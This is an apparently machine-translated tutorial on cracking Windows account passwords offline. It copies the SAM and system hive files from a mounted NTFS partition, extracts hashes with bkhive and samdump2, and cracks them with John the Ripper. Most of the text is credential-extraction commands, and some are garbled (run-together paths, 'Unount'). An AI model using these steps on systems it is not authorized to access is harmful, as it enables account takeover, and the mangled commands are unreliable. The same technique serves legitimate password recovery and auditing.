Linux-based password cracking for SAM

Start in Linux and Mount Windows system partitions to copy SAM and system under the c: windowssystem32config Directory. you can also use WINPE or DOS boot disks, you just need to copy the SAM and system to start cracking: bkhivesystemkeys & nbsp; -- Generate the keys file

Start in Linux and Mount Windows system partitions to copy the SAM and system in the c: windowssystem32config directory.

You can also use WINPE and DOS boot disks. you only need to copy SAM and system.

Start cracking:

Bkhive system keys -- Generate the keys file

Samdump2 SAM keys> hashes -- use SAM and keys to generate hashes <-- IWMS_AD_BEGIN -->
<-- IWMS_AD_END -->

John hashes -- run hashes

Tip:

Direct access to http://www.objectif-securite.ch/en/products.php online query hash

It is not in Linux now. Another day, I will describe it in the text below

Mount-t ntfs/dev/hda1/mnt/windows

Mkdir/home/young001/sam

Cp/mnt/windows/WINDOWSsystem32config/SAM/home/young001/sam

Cp/mnt/windows/WINDOWSsystem32config/system/home/young001/sam

Unount/mnt/windows

Cd/home/young001/sam

Bkhive system keys

Samdump2 SAM keys> hashes

John hashes -- run hashes

The password is found.

Add some tips:

For example, if the administrator password is 123456, it will be shown at the bottom.

Administrator: 123456: 500: e263f50a6a506be3d494d3d62b4dc666, you can run the following command to view

John-1.7.2/run/john-show hashes sometimes the password may display several question marks, as shown below:

Administrator :??? 456: 500: e263f50a6a506be3d494d3d62b4dc666:

John-1.7.2/run/john-show hashes to check whether the password is complete. If the password is still incomplete, the password may not be completely cracked. can I add it? Restore parameters continue to be cracked based on the original

John-1.7.2/run/john -- restore hashes